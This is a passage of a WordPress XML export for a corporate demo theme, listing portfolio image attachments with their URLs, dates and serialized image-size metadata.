		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:605;s:6:"height";i:605;s:4:"file";s:23:"2020/09/project-9.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:23:"project-9-1-300x300.jpg";s:5:"width";i:300;s:6:"height";i:300;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:23:"project-9-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:23:"project-9-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:23:"project-9-1-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:23:"project-9-1-605x600.jpg";s:5:"width";i:605;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>project-8</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/portfolio/financial-statements/project-8/</link>
		<pubDate>Fri, 11 Sep 2020 04:46:44 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/project-8.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>815</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 04:46:44]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 04:46:44]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[project-8]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>814</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/project-8.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/project-8.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:605;s:6:"height";i:769;s:4:"file";s:23:"2020/09/project-8.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:23:"project-8-1-236x300.jpg";s:5:"width";i:236;s:6:"height";i:300;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:23:"project-8-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:23:"project-8-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:23:"project-8-1-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:23:"project-8-1-605x600.jpg";s:5:"width";i:605;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>project-7</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/portfolio/insurance-finance/project-7/</link>
		<pubDate>Fri, 11 Sep 2020 04:47:58 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/project-7.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>819</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 04:47:58]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 04:47:58]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[project-7]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>818</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/project-7.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/project-7.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:605;s:6:"height";i:695;s:4:"file";s:23:"2020/09/project-7.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:23:"project-7-1-261x300.jpg";s:5:"width";i:261;s:6:"height";i:300;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:23:"project-7-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:23:"project-7-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:23:"project-7-1-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:23:"project-7-1-605x600.jpg";s:5:"width";i:605;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>project-5</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/portfolio/fund-management/project-5/</link>
		<pubDate>Fri, 11 Sep 2020 07:01:58 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/project-5.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>823</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 07:01:58]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 07:01:58]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[project-5]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>822</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/project-5.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/project-5.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:605;s:6:"height";i:736;s:4:"file";s:23:"2020/09/project-5.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:23:"project-5-1-247x300.jpg";s:5:"width";i:247;s:6:"height";i:300;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:23:"project-5-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:23:"project-5-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:23:"project-5-1-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:23:"project-5-1-605x600.jpg";s:5:"width";i:605;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>project-6</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/portfolio/data-analytics/project-6/</link>
		<pubDate>Fri, 11 Sep 2020 07:08:06 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/project-6.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>827</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 07:08:06]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 07:08:06]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[project-6]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>826</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/project-6.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/project-6.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:605;s:6:"height";i:605;s:4:"file";s:23:"2020/09/project-6.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:23:"project-6-1-300x300.jpg";s:5:"width";i:300;s:6:"height";i:300;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:23:"project-6-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:23:"project-6-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:23:"project-6-1-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:23:"project-6-1-605x600.jpg";s:5:"width";i:605;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>project-4</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/portfolio/enterprise-loan/project-4/</link>
		<pubDate>Fri, 11 Sep 2020 07:12:04 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/project-4.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>831</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 07:12:04]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 07:12:04]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[project-4]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>830</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/project-4.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/project-4.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:719;s:6:"height";i:797;s:4:"file";s:23:"2020/09/project-4.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:23:"project-4-1-271x300.jpg";s:5:"width";i:271;s:6:"height";i:300;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:23:"project-4-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:23:"project-4-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:23:"project-4-1-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:23:"project-4-1-719x600.jpg";s:5:"width";i:719;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>project-slide-4</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/portfolio/enterprise-loan/project-slide-4/</link>
		<pubDate>Fri, 11 Sep 2020 07:12:26 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/project-slide-4.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>832</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 07:12:26]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 07:12:26]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[project-slide-4]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>830</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/project-slide-4.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/project-slide-4.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:970;s:6:"height";i:580;s:4:"file";s:29:"2020/09/project-slide-4.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:29:"project-slide-4-1-300x179.jpg";s:5:"width";i:300;s:6:"height";i:179;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:29:"project-slide-4-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:29:"project-slide-4-1-768x459.jpg";s:5:"width";i:768;s:6:"height";i:459;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:29:"project-slide-4-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:29:"project-slide-4-1-600x580.jpg";s:5:"width";i:600;s:6:"height";i:580;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>project-slide-5</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/portfolio/data-analytics/project-slide-5/</link>
		<pubDate>Fri, 11 Sep 2020 07:13:11 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/project-slide-5.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>835</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 07:13:11]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 07:13:11]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[project-slide-5]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>826</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/project-slide-5.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/project-slide-5.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:970;s:6:"height";i:580;s:4:"file";s:29:"2020/09/project-slide-5.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:29:"project-slide-5-1-300x179.jpg";s:5:"width";i:300;s:6:"height";i:179;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:29:"project-slide-5-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:29:"project-slide-5-1-768x459.jpg";s:5:"width";i:768;s:6:"height";i:459;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:29:"project-slide-5-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:29:"project-slide-5-1-600x580.jpg";s:5:"width";i:600;s:6:"height";i:580;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>project-3</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/portfolio/digital-marketing/project-3/</link>
		<pubDate>Fri, 11 Sep 2020 07:15:30 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/project-3.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>838</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 07:15:30]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 07:15:30]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[project-3]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>837</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/project-3.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/project-3.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:719;s:6:"height";i:719;s:4:"file";s:23:"2020/09/project-3.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:23:"project-3-1-300x300.jpg";s:5:"width";i:300;s:6:"height";i:300;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:23:"project-3-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:23:"project-3-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:23:"project-3-1-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:23:"project-3-1-719x600.jpg";s:5:"width";i:719;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>project-slide-3</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/portfolio/digital-marketing/project-slide-3/</link>
		<pubDate>Fri, 11 Sep 2020 07:15:38 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/project-slide-3.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>839</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 07:15:38]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 07:15:38]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[project-slide-3]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>837</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/project-slide-3.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/project-slide-3.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:970;s:6:"height";i:580;s:4:"file";s:29:"2020/09/project-slide-3.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:29:"project-slide-3-1-300x179.jpg";s:5:"width";i:300;s:6:"height";i:179;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:29:"project-slide-3-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:29:"project-slide-3-1-768x459.jpg";s:5:"width";i:768;s:6:"height";i:459;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:29:"project-slide-3-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:29:"project-slide-3-1-600x580.jpg";s:5:"width";i:600;s:6:"height";i:580;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>project-slide-2</title>
